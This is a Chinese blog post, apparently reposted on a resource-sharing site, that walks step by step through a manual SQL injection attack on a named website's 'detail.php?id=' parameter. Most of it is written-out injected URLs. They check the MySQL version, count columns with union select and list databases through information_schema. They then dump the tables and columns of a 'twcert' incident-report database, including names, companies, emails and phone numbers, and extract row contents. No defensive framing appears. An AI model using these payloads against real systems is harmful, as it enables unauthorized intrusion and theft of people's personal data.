PHP遭受SQL注入攻击,网站被入侵。

摘要

破解数据库,先判断版本,再猜字段数。技术高超,挑战极限。

正文

【摘要】1.判断版本http://www.qqkiss.tk/document/advisory/detail.php?id=7andord(mid(version(),1,1))>51返回正常,说明大于4.0版本,支持ounion查询2.猜解字段数目,用orderby也可以猜,也可以… 1.判断版本http://www.qqkiss.tk/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解http://www.qqkiss.tk/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9–3.查看数据库版本及当前用户,http://www.qqkiss.tk/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9–数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。4.判断有没有写权限http://www.qqkiss.tk/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0– 返回错误,没有写权限没办法,手动猜表啦5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns–成功查出所有数据库,国外的黑客就是不一般。数据库如下:information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb6.爆表,爆的是twcert库http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274–爆出如下表downloadfile,irsys,newsdata,secrpt,secrpt_big57.爆列名,这次爆的是irsys表http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973–爆出如下列ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys–返回是3,说明每个列里有3个地段9.爆字段内容http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1–爆出name列的第一个字段的内容http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1–爆出name列的第二个字段的内容

关注不迷路

扫码下方二维码,关注宇凡盒子公众号,免费获取最新技术内幕!

温馨提示:如果您访问和下载本站资源,表示您已同意只将下载文件用于研究、学习而非其他用途。
文章版权声明 1、本网站名称:宇凡盒子
2、本站文章未经许可,禁止转载!
3、如果文章内容介绍中无特别注明,本网站压缩包解压需要密码统一是:yufanbox.com
4、本站仅供资源信息交流学习,不保证资源的可用及完整性,不提供安装使用及技术服务。点此了解
5、如果您发现本站分享的资源侵犯了您的权益,请及时通知我们,我们会在接到通知后及时处理!提交入口
0

评论0

请先

站点公告

🚀 【宇凡盒子】全网资源库转储中心

👉 注册即送VIP权限👈

👻 全站资源免费下载✅,欢迎注册!

记得 【收藏】+【关注】 谢谢!~~~

立即注册
没有账号?注册  忘记密码?

社交账号快速登录